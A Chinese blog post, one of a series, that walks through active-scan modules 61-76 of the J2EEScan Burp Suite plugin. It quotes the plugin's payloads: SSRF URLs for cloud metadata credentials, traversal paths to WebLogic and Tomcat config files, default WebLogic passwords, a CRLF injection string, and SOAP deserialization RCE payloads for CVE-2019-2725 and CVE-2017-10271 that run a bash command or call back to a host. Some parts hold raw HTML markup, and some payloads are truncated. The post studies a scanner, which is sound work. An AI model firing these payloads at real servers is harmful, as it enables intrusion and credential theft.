【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(61-76)

【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(61-70)

前言

插件开发学习第11套。前置文章:

【BurpSuite】插件开发学习之Log4shell
【BurpSuite】插件开发学习之Software Vulnerability Scanner
【BurpSuite】插件开发学习之dotnet-Beautifier
【BurpSuite】插件开发学习之active-scan-plus-plus
【BurpSuite】插件开发学习之J2EEScan(上)-被动扫描
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(1-10)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(11-20)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(21-30)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(31-40)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(41-50)
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(51-60)

分析

【61】SSRFScanner

地址:

    private static final List<byte[]> SSRF_INJECTION_TESTS = Arrays.asList(
            "gopher://localhost:22/".getBytes(),
            "http://[::]:22/".getBytes(),
            "ftp://[::]:22/".getBytes(),
            "ftp://localhost:22/".getBytes(),
            "ftp://0.0.0.0:22/".getBytes(),
            "ftp://0177.0000.0000.0001:22".getBytes(),
            "ftp://0x7f.1:22/".getBytes(),
            "http://spoofed.burpcollaborator.net:22/".getBytes()
    );

这是打本地的22端口
match就是

    private static final byte[] GREP_STRING = "OpenSSH".getBytes();

然后就是访问云上各种元数据

  private static final Map<byte[], Pattern> SSRF_CLOUD_INJECTION_TESTS = new HashMap<byte[], Pattern>() {
        {
            put("http://169.254.169.254/latest/meta-data/".getBytes(), Pattern.compile("identity-credentials", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
            put("http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token".getBytes(), Pattern.compile("token_type", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        
        }

这里注释给出了一些情况

     *
     * Source AWS
     * http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
     *
     * http://169.254.169.254/latest/user-data
     * http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]
     * http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME] 
     * http://169.254.169.254/latest/meta-data/ami-id
     * http://169.254.169.254/latest/meta-data/reservation-id
     * http://169.254.169.254/latest/meta-data/hostname
     * http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
     * http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
     *
     * # AWS - Dirs http://169.254.169.254/
     * http://169.254.169.254/latest/meta-data/
     * http://169.254.169.254/latest/meta-data/public-keys/
     *

互联网上也有很多总结

http://cn-sec.com/archives/840191.html

【62】StatusServlet

payload

    private static final List<String> STATUS_SERVLET_PATHS = Arrays.asList(
            "/status?full=true",
            "/web-console/status?full=true",
            "/server-status?full=true"
    );

如果是401

           if (statusInfo.getStatusCode() == 401) {

则认为是存在登录接口
然后就是弱口令测试

                        WeakPasswordBruteforcer br = new WeakPasswordBruteforcer();

如果match到了200且有如下返回,说明存在不同类型服务信息泄露

    private static final byte[] GREP_STRING_J2EE = "Status Servlet".getBytes();
        private static final byte[] GREP_STRING_HTTPD = "Apache Server Status".getBytes();


【63】TomcatHostManager

tomcat管理后台泄露,比较常见了

private static final List<String> TOMCAT_HOST_MANAGER_PATHS = Arrays.asList(
            "/host-manager/html?j2eescan"
    );

爆破

【64】TomcatManager

同63

    private static final List<String> TOMCAT_MANAGER_PATHS = Arrays.asList(
            "/manager/html"
    );

【65】UndertowTraversal CVE-2014-7816

Jboss的问题
payload

    private static final List<String> JBOSS_PATHS = Arrays.asList(
            "/..\\\\standalone\\\\configuration\\\\standalone.xml"
    );

match的是读取的xml

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            ".getBytes()
    );
 

【66】URINormalizationTomcat

未授权访问tomcat

    private static final List<String> TOMCAT_URI_NORMALIZATIONS = Arrays.asList(
            "..;/manager/html",
            "..;/"
    );

眼熟啊,shiro的未授权访问也是这么绕的

【67】UTF8ResponseSplitting

好像又是个crlf
payload

    private static final byte[] INJ = "%E5%98%8A%E5%98%8DX-Injection:%20test".getBytes();

match返回包

        if (getResponseHeaderValue(responseInfo, "X-Injection") != null) {

【68】WebInfInformationDisclosure

payload

    private static final List<String> WEBINF_PATHS = Arrays.asList(
            "/WEB-INF./web.xml",
            "//WEB-INF/web.xml",
            "/WEB-INF/web.xml",
            "/static/WEB-INF/web.xml", // CVE-2014-0053 
            "/forward:/WEB-INF/web.xml", // spring issue
            "/web-inf./web.xml", // CVE-2016-0793 https://bugzilla.redhat.com/show_bug.cgi?id=1305937
            "/.//WEB-INF/web.xml",
            "/./WEB-INF/web.xml"
    );

match

 private static final byte[] GREP_STRING = ".getBytes();

任意文件读取也可以多尝试此类文件。

【69】WeblogicConsole

登录接口path

    private static final List<String> WEBLOGIC_CONSOLE_PATHS = Arrays.asList(
            "/console/login/LoginForm.jsp;ADMINCONSOLESESSION=TynPs0LnRt9BLctc13WMYmhQpsp3cG1LCNDp78TJyDfHMWhC4Kln!1225542286"
    );

match

    private static final List<byte[]> GREP_WEBLOGIC_STRINGS = Arrays.asList(
            "BEA WebLogic Server Administration Console"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"<title>Oracle WebLogic Server Administration Console"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"<TITLE>WebLogic Server"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>说明存在爆破的可能<br> 然后开始爆破</p> 
  <pre><code class="prism language-java">        <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">Map<span class="token punctuation">.</span>Entry</span><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">,</span> <span class="token class-name">String</span><span class="token punctuation">></span><span class="token punctuation">></span></span> credentials <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">ArrayList</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"weblogic01"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        credentials<span class="token punctuation">.</span><span class="token function">add</span><span class="token punctuation">(</span><span class="token keyword">new</span> <span class="token class-name">AbstractMap<span class="token punctuation">.</span>SimpleEntry</span><span class="token generics"><span class="token punctuation"><</span><span class="token punctuation">></span></span><span class="token punctuation">(</span><span class="token string">"weblogic"</span><span class="token punctuation">,</span> <span class="token string">"welcome1"</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>比较粗糙,只尝试了4个弱口令和一个账号。</p> 
  <h3>【70】Weblogic CVE-2019-2725</h3> 
  <p>问题路径</p> 
  <pre><code class="prism language-java"><span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> ASYNC_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/_async/AsyncResponseService"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>payload</p> 
  <pre><code class="prism language-java">    <span class="token class-name">String</span> serializedRce <span class="token operator">=</span> <span class="token string">"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">   "</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<wsa:Action>ONRaJntRjNYBc3MJW2JC</wsa:Action>"</span>
                    <span class="token operator">+</span> <span class="token string">"<wsa:RelatesTo>42PlWZ15ODi1hQ3pQ5Ol</wsa:RelatesTo>"</span>
                    <span class="token operator">+</span> <span class="token string">"<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<void class=\"java.lang.ProcessBuilder\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<array class=\"java.lang.String\" length=\"3\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<void index=\"0\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<string>/bin/bash</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"</void>"</span>
                    <span class="token operator">+</span> <span class="token string">"<void index=\"1\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<string>-c</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"</void>"</span>
                    <span class="token operator">+</span> <span class="token string">"<void index=\"2\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<string>ping -c 3 %s</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"</void>"</span>
                    <span class="token operator">+</span> <span class="token string">"</array>"</span>
                    <span class="token operator">+</span> <span class="token string">"<void method=\"start\"/></void>"</span>
                    <span class="token operator">+</span> <span class="token string">"</work:WorkContext>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Body>"</span>
                    <span class="token operator">+</span> <span class="token string">"<asy:onAsyncDelivery/>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Body></soapenv:Envelope>"</span><span class="token punctuation">;</span>

            <span class="token comment">// Collaborator context</span>
</code></pre> 
  <p>这是个RCE hw用的可能比较多</p> 
  <h3>【71】Weblogic CVE-2017-10271</h3> 
  <p>这个可以尝试的path就更多了</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> WLS_WSAT_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/wls-wsat/CoordinatorPortType"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/CoordinatorPortType11"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/ParticipantPortType"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/ParticipantPortType11"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationPortTypeRPC"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationPortTypeRPC11"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationRequesterPortType"</span><span class="token punctuation">,</span>
            <span class="token string">"/wls-wsat/RegistrationRequesterPortType11"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>payload</p> 
  <pre><code class="prism language-java">  <span class="token class-name">String</span> serializedRce <span class="token operator">=</span> <span class="token string">"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">"</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">"</span>
                    <span class="token operator">+</span> <span class="token string">"  <java version=\"1.8\" class=\"java.beans.XMLDecoder\">"</span>
                    <span class="token operator">+</span> <span class="token string">"    <void id=\"url\" class=\"java.net.URL\">"</span>
                    <span class="token operator">+</span> <span class="token string">"      <string>http://%s</string>"</span>
                    <span class="token operator">+</span> <span class="token string">"    </void>"</span>
                    <span class="token operator">+</span> <span class="token string">"    <void idref=\"url\">"</span>
                    <span class="token operator">+</span> <span class="token string">"      <void id=\"stream\" method = \"openStream\" />"</span>
                    <span class="token operator">+</span> <span class="token string">"    </void>"</span>
                    <span class="token operator">+</span> <span class="token string">"  </java>"</span>
                    <span class="token operator">+</span> <span class="token string">"</work:WorkContext>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Header>"</span>
                    <span class="token operator">+</span> <span class="token string">"<soapenv:Body/>"</span>
                    <span class="token operator">+</span> <span class="token string">"</soapenv:Envelope>"</span><span class="token punctuation">;</span>
</code></pre> 
  <p>这也是RCE</p> 
  <h3>【72】WeblogicUDDIExplorer CVE-2014-4210 ssrf</h3> 
  <p>path</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> UDDI_PATHS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/uddiexplorer/"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>
</code></pre> 
  <p>match到这些</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_SSRF_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"could not connect over HTTP to server:"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"XML_SoapException: Connection refused"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"XML_SoapException: Received a response from url"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>说明存在SSRF</p> 
  <p>比较粗的判断<br> 实际还需要去发送特定的漏洞请求<br> <a href="https://img.it610.com/image/info8/ab88e4403b5f4181acba94995052c308.jpg" target="_blank"><img src="https://img.it610.com/image/info8/ab88e4403b5f4181acba94995052c308.jpg" alt="【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(61-76)_第1张图片" width="650" height="493" style="border:1px solid black;"></a></p> 
  <h3>【73】WeblogicWebServiceTestPage CVE-2018-2894</h3> 
  <p>漏洞path</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token generics"><span class="token punctuation"><</span><span class="token class-name">String</span><span class="token punctuation">></span></span> WS_TEST_PAGES <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"/ws_utc/config.do"</span>
    <span class="token punctuation">)</span><span class="token punctuation">;</span>

</code></pre> 
  <p>match</p> 
  <pre><code class="prism language-java">    <span class="token keyword">private</span> <span class="token keyword">static</span> <span class="token keyword">final</span> <span class="token class-name">List</span><span class="token operator"><</span><span class="token keyword">byte</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token operator">></span> GREP_STRINGS <span class="token operator">=</span> <span class="token class-name">Arrays</span><span class="token punctuation">.</span><span class="token function">asList</span><span class="token punctuation">(</span>
            <span class="token string">"<title>settings".getBytes()
    );

则存在漏洞

这是个任意文件上传的测试页面,不需要权限控制
【BurpSuite】插件开发学习之J2EEScan(下)-主动扫描(61-76)_第2张图片

【74】XInclude 任意文件上传

payload一把锁

    private static final List<byte[]> XINCLUDE_INJ_TESTS = Arrays.asList(
            "".getBytes());  

【75】XXEModule

payload

    private static final String XXE_DTD_DEFINITION = "]>";

这是可回显的,看着像是通用性的一个插件

【76】XXEParameterModule

payload

    private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
            "]>&xxe;".getBytes(),
            // https://twitter.com/Agarri_FR/status/656440244116574208
            " %dtd;]>]]>".getBytes()
            );

一样的
一个是打did一个是直接解析回显
match

    private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

但通常打did不用file测试,用http协议会比较常见可以打DNSlog

你可能感兴趣的